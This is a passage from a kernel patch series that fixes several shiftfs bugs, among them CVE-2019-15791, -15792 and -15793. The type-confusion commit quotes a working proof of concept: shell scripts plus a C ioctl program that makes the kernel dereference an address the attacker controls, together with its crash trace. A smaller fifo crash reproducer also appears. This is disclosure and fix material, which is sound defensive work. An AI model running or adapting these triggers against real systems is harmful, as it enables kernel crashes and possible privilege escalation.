-[ 183.516155] __x64_sys_mmap+0x33/0x40
-[ 183.517352] do_syscall_64+0x5a/0x130
-[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
-[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
-[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
-[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
-[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
-[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
-[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
-[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
-[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
-[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
-[ 183.560350] ---[ end trace 4a860910803657c2 ]---
-[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-=======================================
-
-Disassembly of surrounding code:
-
-55 push rbp
-4889E5 mov rbp,rsp
-4157 push r15
-4156 push r14
-4155 push r13
-4154 push r12
-488B87C8000000 mov rax,[rdi+0xc8]
-4C8B6810 mov r13,[rax+0x10]
-498B4528 mov rax,[r13+0x28]
-4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
-0F8497000000 jz near 0xcc
-4989FC mov r12,rdi
-4989F6 mov r14,rsi
-
-This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
-think this corresponds to the load of "realfile->f_op->mmap" in the source code.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15791
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 35 +++++++++++++++++++++--------------
- 1 file changed, 21 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 0d6ce377b07c..9a6a7ad50b90 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
- 	return false;
- }
- 
--static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
--					  void __user *arg,
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args *v1,
- 					  struct btrfs_ioctl_vol_args_v2 *v2)
- {
-@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	fdput(lfd);
- 	__close_fd(current->files, fd);
- 	kfree(v1);
- 	kfree(v2);
-@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args **b1,
- 					  struct btrfs_ioctl_vol_args_v2 **b2,
--					  struct fd *lfd,
- 					  int *newfd)
- {
- 	int oldfd, ret;
- 	struct fd src;
-+	struct fd lfd = {};
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	if (!src.file)
- 		return -EINVAL;
- 
--	ret = shiftfs_real_fdget(src.file, lfd);
--	fdput(src);
--	if (ret)
-+	ret = shiftfs_real_fdget(src.file, &lfd);
-+	if (ret) {
-+		fdput(src);
- 		return ret;
-+	}
-+
-+	/*
-+	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
-+	 * take a reference here to offset the one which will be put by
-+	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 */
-+	get_file(lfd.file);
-+	lfd.flags |= FDPUT_FPUT;
-+	fdput(src);
- 
--	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
--		fdput(*lfd);
-+		fdput(lfd);
- 		return *newfd;
- 	}
- 
--	fd_install(*newfd, lfd->file);
-+	fd_install(*newfd, lfd.file);
- 
- 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
- 		v1->fd = *newfd;
-@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	}
- 
- 	if (ret)
--		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
- 
- 	return ret;
- }
-@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	int newfd = -EBADF;
- 	long err = 0, ret = 0;
- 	void __user *argp = (void __user *)arg;
--	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
- 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
- 
- 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
--					     &btrfs_lfd, &newfd);
-+					     &newfd);
- 	if (ret < 0)
- 		return ret;
- 
-@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	fdput(lowerfd);
- 
- out_restore:
--	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
- 					     btrfs_v1, btrfs_v2);
- 	if (!ret)
- 		ret = err;
--- 
-2.39.2
-
-From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 1 Nov 2019 14:19:16 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Verify filesystem type in shiftfs_real_fdget().
-
-Quoting Jann Horn:
- #################### Bug 2: Type confusion ####################
-
- shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
- passes the resulting file* into shiftfs_real_fdget(), which does this:
-
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
-  struct shiftfs_file_info *file_info = file->private_data;
-  struct file *realfile = file_info->realfile;
-
-  lowerfd->flags = 0;
-  lowerfd->file = realfile;
-
-  /* Did the flags change since open? */
-  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-   return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
-  return 0;
- }
-
- file->private_data is a void* that points to a filesystem-dependent type; and
- some filesystems even use it to store a type-cast number instead of a pointer.
- The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
-
- As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
- (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
- offset 0x10), and I use that to cause a memory dereference somewhere around
- 0x4242:
-
- =======================================
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
- #!/bin/sh
- sync
- unshare -mUr ./run2.sh
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
- #!/bin/sh
- set -e
-
- mkdir -p mnt/tmpfs
- mkdir -p mnt/shiftfs
- mount -t tmpfs none mnt/tmpfs
- mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
- mount|grep shift
- gcc -o ioctl ioctl.c -Wall
- ./ioctl
- user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
- #include <sys/ioctl.h>
- #include <fcntl.h>
- #include <err.h>
- #include <unistd.h>
- #include <linux/btrfs.h>
- #include <sys/mman.h>
-
- int main(void) {
-   // make our vmacache sequence number something like 0x4242
-   for (int i=0; i<0x4242; i++) {
-     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
-         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
-     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
-     munmap(x, 0x1000);
-   }
-
-   int root = open("mnt/shiftfs", O_RDONLY);
-   if (root == -1) err(1, "open shiftfs root");
-   int foofd = open("/proc/self/environ", O_RDONLY);
-   if (foofd == -1) err(1, "open foofd");
-   // trigger the confusion
-   struct btrfs_ioctl_vol_args iocarg = {
-     .fd = foofd
-   };
-   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
- }
- user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
- none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
- /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
- [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
- [ 348.105060] #PF: supervisor read access in kernel mode
- [ 348.106573] #PF: error_code(0x0000) - not-present page
- [ 348.108102] PGD 0 P4D 0
- [ 348.108871] Oops: 0000 [#1] SMP PTI
- [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
- [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
- [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- [ 348.143545] Call Trace:
- [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
- [ 348.145562] do_vfs_ioctl+0x407/0x670
- [ 348.146620] ? putname+0x4a/0x50
- [ 348.147556] ksys_ioctl+0x67/0x90
- [ 348.148514] __x64_sys_ioctl+0x1a/0x20
- [ 348.149593] do_syscall_64+0x5a/0x130
- [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
- [ 348.152108] RIP: 0033:0x7f77fa76767b
- [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
- [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
- [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
- [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
- [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
- [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
- [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
- [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
- [ 348.188617] CR2: 0000000000004289
- [ 348.189586] ---[ end trace dad859a1db86d660 ]---
- [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- Killed
- user@ubuntu1910vm:~/shiftfs_confuse$
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-[ saf: use f_op->open instead as special inodes in shiftfs sbs
-  will not use shiftfs open f_ops ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15792
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 33 +++++++++++++++++++--------------
- 1 file changed, 19 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9a6a7ad50b90..897e0163005e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 	return 0;
- }
- 
--static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
--{
--	struct file *realfile = file->private_data;
--
--	lowerfd->flags = 0;
--	lowerfd->file = realfile;
--
--	/* Did the flags change since open? */
--	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
--		return shiftfs_change_flags(lowerfd->file, file->f_flags);
--
--	return 0;
--}
--
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
- 	struct file *realfile;
-@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
- 	return flags;
- }
- 
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct file *realfile;
-+
-+	if (file->f_op->open != shiftfs_open &&
-+	    file->f_op->open != shiftfs_dir_open)
-+		return -EINVAL;
-+
-+	realfile = file->private_data;
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
- static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
- {
- 	struct file *file = iocb->ki_filp;
--- 
-2.39.2
-
-From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 13:35:25 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
- operations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Several locations which shift ids translate user/group ids before
-performing operations in the lower filesystem are translating
-them into init_user_ns, whereas they should be translated into
-the s_user_ns for the lower filesystem. This will result in using
-ids other than the intended ones in the lower fs, which will
-likely not map into the shifts s_user_ns.
-
-Change these sites to use shift_k[ug]id() to do a translation
-into the s_user_ns of the lower filesystem.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15793
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 43 +++++++++++++++++++++++--------------------
- 1 file changed, 23 insertions(+), 20 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 897e0163005e..04fba4689eb6 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred,
- 	put_cred(newcred);
- }
- 
-+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
-+			 kuid_t kuid)
-+{
-+	uid_t uid = from_kuid(from, kuid);
-+	return make_kuid(to, uid);
-+}
-+
-+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
-+			 kgid_t kgid)
-+{
-+	gid_t gid = from_kgid(from, kgid);
-+	return make_kgid(to, gid);
-+}
-+
- static int shiftfs_override_object_creds(const struct super_block *sb,
- 					 const struct cred **oldcred,
- 					 struct cred **newcred,
- 					 struct dentry *dentry, umode_t mode,
- 					 bool hardlink)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	if (!hardlink) {
- 		int err = security_dentry_create_files_as(dentry, mode,
-@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb,
- 	return 0;
- }
- 
--static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to,
--			 kuid_t kuid)
--{
--	uid_t uid = from_kuid(from, kuid);
--	return make_kuid(to, uid);
--}
--
--static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to,
--			 kgid_t kgid)
--{
--	gid_t gid = from_kgid(from, kgid);
--	return make_kgid(to, gid);
--}
--
- static void shiftfs_copyattr(struct inode *from, struct inode *to)
- {
- 	struct user_namespace *from_ns = from->i_sb->s_user_ns;
-@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
- 	err = setattr_prepare(dentry, attr);
-@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 		return err;
- 
- 	newattr = *attr;
--	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
--	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-+	newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
-+	newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
- 
- 	/*
- 	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 					const struct cred **oldcred,
- 					struct cred **newcred)
- {
-+	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	kuid_t fsuid = current_fsuid();
- 	kgid_t fsgid = current_fsgid();
- 
-@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb,
- 		return -ENOMEM;
- 	}
- 
--	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
--	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
-+	(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
-+	(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
- 
- 	/* clear all caps to prevent bypassing capable() checks */
- 	cap_clear((*newcred)->cap_bset);
--- 
-2.39.2
-
-From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 17 Jan 2020 16:17:06 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going
- negative during unlink
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1860041
-
-All non-special files (For shiftfs this only includes fifos and - for
-this case - unix sockets - since we don't allow character and block
-devices to be created.) go through shiftfs_open() and have their dentry
-pinned through this codepath preventing it from going negative. But
-fifos don't use the shiftfs fops but rather use the pipefifo_fops which
-means they do not go through shiftfs_open() and thus don't have their
-dentry pinned that way. Thus, the lower dentries for such files can go
-negative on unlink causing segfaults. The following C program can be
-used to reproduce the crash:
-
- #include <stdio.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <unistd.h>
- #include <stdlib.h>
-
- int main(int argc, char *argv[])
- {
-        struct stat stat;
-
-        unlink("./bbb");
-
-        int ret = mknod("./bbb", S_IFIFO|0666, 0);
-        if (ret < 0)
-                exit(1);
-
-        int fd = open("./bbb", O_RDWR);
-        if (fd < 0)
-                exit(2);
-
-        if (unlink("./bbb"))
-                exit(4);
-
-        fstat(fd, &stat);
-
-        return 0;
- }
-
-Similar to ecryptfs we need to dget() the lower dentry before calling
-vfs_unlink() on it and dput() it afterwards.
-
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 04fba4689eb6..3623d02b061e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	int err;
- 	const struct cred *oldcred;
- 
-+	dget(lowerd);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
-@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	inode_unlock(loweri);
- 
- 	shiftfs_copyattr(loweri, dir);
-+	dput(lowerd);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 10 Apr 2020 16:55:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1872094
-
-When shiftfs is nested we failed to be able to create any files or
-access directories because we recorded the wrong creator credentials. We
-need to record the credentials of the creator of the lowers mark mount
-of shiftfs. Otherwise we aren't privileged wrt to the shiftfs layer in
-the nesting case. This is similar to how we always record the user
-namespace of the base filesystem.
-
-Suggested-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 17 +++++++++--------
- 1 file changed, 9 insertions(+), 8 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 3623d02b061e..5c39529d0a17 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * parent mark mountpoint.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
-+			sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			 * are identical.
- 			 */
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
--		}
- 
--		cred_tmp = prepare_creds();
--		if (!cred_tmp) {
--			err = -ENOMEM;
--			goto out_put_path;
-+			cred_tmp = prepare_creds();
-+			if (!cred_tmp) {
-+				err = -ENOMEM;
-+				goto out_put_path;
-+			}
-+			/* Don't override disk quota limits or use reserved space. */
-+			cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+			sbinfo->creator_cred = cred_tmp;
- 		}
--		/* Don't override disk quota limits or use reserved space. */
